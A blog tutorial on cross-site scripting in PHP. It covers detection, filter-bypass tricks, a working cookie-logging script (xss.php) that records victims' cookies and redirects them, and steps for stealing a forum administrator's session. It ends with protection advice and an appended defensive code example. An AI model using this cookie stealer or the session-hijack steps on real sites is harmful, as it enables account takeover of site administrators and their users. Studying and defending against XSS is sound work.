Last updated: July 16, 2022
In this post, I will tell you about the cross-site scripting flaw, abbreviated XSS. We will see together how to exploit this flaw and of course how to protect yourself from it.
Before starting, I must clarify one thing: many people think that this flaw is useless. Well, that's wrong. Believe me, the XSS flaw is dangerous: of course you will not be able to take control of a server with this flaw alone, but it makes other types of attacks easier. You just have to know how to use it.
What is The XSS Flaw?
The XSS flaw, originally abbreviated CSS (Cross Site Scripting) and renamed to avoid confusion with Cascading Style Sheets (CSS), is a type of website security vulnerability found in badly secured web applications.
How to detect the presence of an XSS flaw?
XSS flaws are widespread on the web, more specifically in forums, web applications and search engines.
If a dialog box appears, we can conclude that the web application is vulnerable to XSS attacks.
To fully understand the principle, nothing beats an example.
Assume the following code:
<?php
// Deliberately vulnerable: the GET parameter is echoed into the page without any escaping
if (isset($_GET['mot_recherche']))
    echo "You are looking for the following word: " . $_GET['mot_recherche'];
On a web browser this would give:
How to bypass XSS filters?
In reality, it doesn't always work that way. Web developers are aware of this attack, so they have developed methods to secure their web applications against this vulnerability. One example I can quote is magic_quotes_gpc.
In this part, I'll show you how to bypass some filters used by developers to secure web applications:
When the magic_quotes function is activated, all ' (apostrophe), " (double quote), \ (backslash) and NULL characters are automatically escaped with a backslash. The magic_quotes_gpc function is used to protect the data sent by the GET and POST methods.
For example if I enter the following code in the search bar and click send:
This function converts our text into decimal character codes.
For this I will use Hackbar, a Firefox plugin.
Using "hack" (without quotes) will look like this:
Miracle, it works!
This filter, for example, blocks the following words:
Here, if we enter alert('Hack'), the site gives us the message alert() because it removes every occurrence of the blocked words.
To bypass this filter, we simply write each blocked word with a copy of itself spliced into the middle, for example alert becomes alealertrt,
like this:
Once the banned words are stripped out, we are left with:
And it still works!
There is also a Firefox plugin, XSS Me, that specializes in finding this type of vulnerability.
How to exploit an XSS vulnerability?
OK, so as we have just seen, XSS flaws run on the client side. To trap a target, we have to make the site administrator run our script himself, and then retrieve his cookie.
So to exploit the XSS flaw, we need a PHP script that will retrieve the value of the $cookie variable and write it to a .txt file.
For that, create a file named xss.php and put the following code in it:
<?php
$cookie = $_GET['a']; // we read a as a GET variable
$fp = fopen('cookies.txt', 'a'); // open cookies.txt in append mode
fputs($fp, $cookie . "\r\n"); // write the content of the cookie on a new line
fclose($fp); // close the cookies.txt file
// Redirect the target to google.fr so that he doesn't suspect anything
header('Location: http://www.google.fr/');
Save the xss.php file, then upload it via FTP to a host that supports PHP. Our script is now in place; all that remains is to test it.
Imagine that by testing the techniques mentioned above on a forum, where you are a member, you detect the presence of an XSS vulnerability and you want to use the PHP script that we have created.
How do we do it?
You simply post a message on the forum containing the following text:
Looking at the code, we can clearly see the ?a= part: it is the $_GET['a'] variable of our script.
document.cookie represents the victim's cookie.
You have just retrieved the forum admin cookie, but what to do with it?
At this point, many people think that XSS vulnerabilities are not dangerous, but they are badly mistaken.
Once you have retrieved a cookie, you can put it in your browser's cookie folder. Then restart your web browser and you can access the admin session without needing a password.
Protect yourself from the XSS vulnerability
Several techniques allow you to protect yourself from the XSS flaw:
- The htmlspecialchars() function converts special characters to HTML entities.
- The strip_tags() function removes all HTML tags.
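As an added example (not code from the original post), here is the search page from earlier in its vulnerable form beside a hardened version that escapes the output with htmlspecialchars(); the function names and sample inputs are my own. It also shows why strip_tags() on its own is not enough, and how the HttpOnly cookie flag blunts the document.cookie theft described above.

```php
<?php
// Added example: vulnerable vs. hardened rendering of the search term.
// Function names and the sample payloads below are assumptions for this demo.

// Limits the impact of a successful XSS: JavaScript can no longer read the
// session cookie through document.cookie. Must be set before session_start().
ini_set('session.cookie_httponly', '1');

// Vulnerable: the parameter is echoed straight into the HTML.
function render_search_vulnerable(string $term): string
{
    return "You are looking for the following word: " . $term;
}

// Hardened: every special character becomes an HTML entity, so the browser
// displays the payload as text instead of executing it. ENT_QUOTES also
// escapes single quotes, which matters if the value lands in an attribute.
function render_search_safe(string $term): string
{
    $escaped = htmlspecialchars($term, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "You are looking for the following word: " . $escaped;
}

// strip_tags() removes <script> but leaves quotes and event-handler text
// untouched, so a value echoed inside an attribute would still break out.
function render_search_strip_tags_only(string $term): string
{
    return "You are looking for the following word: " . strip_tags($term);
}

// Constructed sample inputs (not taken from the post).
$payloads = [
    "<script>alert('Hack')</script>",          // stripped by strip_tags()
    "\" onmouseover=\"alert('Hack')",           // passes strip_tags() unchanged
];

foreach ($payloads as $p) {
    echo "vulnerable : " . render_search_vulnerable($p) . PHP_EOL;
    echo "strip_tags : " . render_search_strip_tags_only($p) . PHP_EOL;
    echo "safe       : " . render_search_safe($p) . PHP_EOL . PHP_EOL;
}
```

Run it from the command line with php and compare the three lines for each payload: only the safe version neutralises both inputs.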
I hope you can learn something from this article, and understand the danger of the XSS flaw!
If not, think about sharing this post on Facebook or Twitter, that would make me really happy! 😉